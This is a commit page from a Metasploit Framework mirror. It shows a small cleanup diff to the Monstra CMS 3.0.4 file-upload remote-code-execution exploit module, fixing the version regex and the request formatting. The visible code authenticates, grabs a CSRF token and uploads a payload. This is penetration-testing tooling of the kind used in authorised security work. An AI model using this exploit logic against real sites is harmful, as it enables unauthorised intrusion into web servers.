infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

modified regex, id=filesmanager lines

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-09 10:55:29 -05:00
parent bc33078e01
commit 44b9798afb
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/multi/http/monstra_fileupload_exec.rb
View File

@ -69,11 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
return CheckCode::Unknown return CheckCode::Unknown
end end
if res.body =~ /<\/a> - Version (\d+\.\d+\.\d+)/i if res.body =~ /<\/a>.*?Version (\d+\.\d+\.\d+)/i
version = Gem::Version.new($1) version = Gem::Version.new($1)
vprint_status("Monstra CMS: #{version}") vprint_status("Monstra CMS: #{version}")
if version == '3.0.4' if version.to_s == '3.0.4'
return CheckCode::Vulnerable return CheckCode::Vulnerable
else else
return CheckCode::Safe return CheckCode::Safe
@ -95,8 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
'vars_post' => { 'vars_post' => {
'login' => datastore['USERNAME'], 'login' => datastore['USERNAME'],
'password' => datastore['PASSWORD'], 'password' => datastore['PASSWORD'],
'login_submit' => 'Log+In', 'login_submit' => 'Log+In'
}, }
}) })
cookies = res.get_cookies cookies = res.get_cookies
@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(uri, 'admin' '/index.php'), 'uri' => normalize_uri(uri, 'admin' '/index.php'),
'cookie' => cookies, 'cookie' => cookies
}) })
fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil? fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil?
@ -134,9 +134,9 @@ class MetasploitModule < Msf::Exploit::Remote
# Request for CSRF token for file upload. # Request for CSRF token for file upload.
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(uri, 'admin', '/index.php'), 'uri' => normalize_uri(uri, 'admin', '/index.php'),
'vars_get' => 'id=filesmanager', 'vars_get' => {'id' => 'filesmanager'},
'method' => 'GET', 'method' => 'GET',
'cookie' => cookies, 'cookie' => cookies
}) })
# Grabbing CSRF token from body # Grabbing CSRF token from body
@ -155,12 +155,12 @@ class MetasploitModule < Msf::Exploit::Remote
# Lets Send Upload request. # Lets Send Upload request.
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(uri, 'admin', '/index.php'), 'uri' => normalize_uri(uri, 'admin', '/index.php'),
'vars_get' => 'id=filesmanager', 'vars_get' => {'id' => 'filesmanager'},
'method' => 'POST', 'method' => 'POST',
'cookie' => cookies, 'cookie' => cookies,
'Connection' => 'close', 'Connection' => 'close',
'data' => data, 'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
}) })
# Cleanup delete payload after get meterpreter. # Cleanup delete payload after get meterpreter.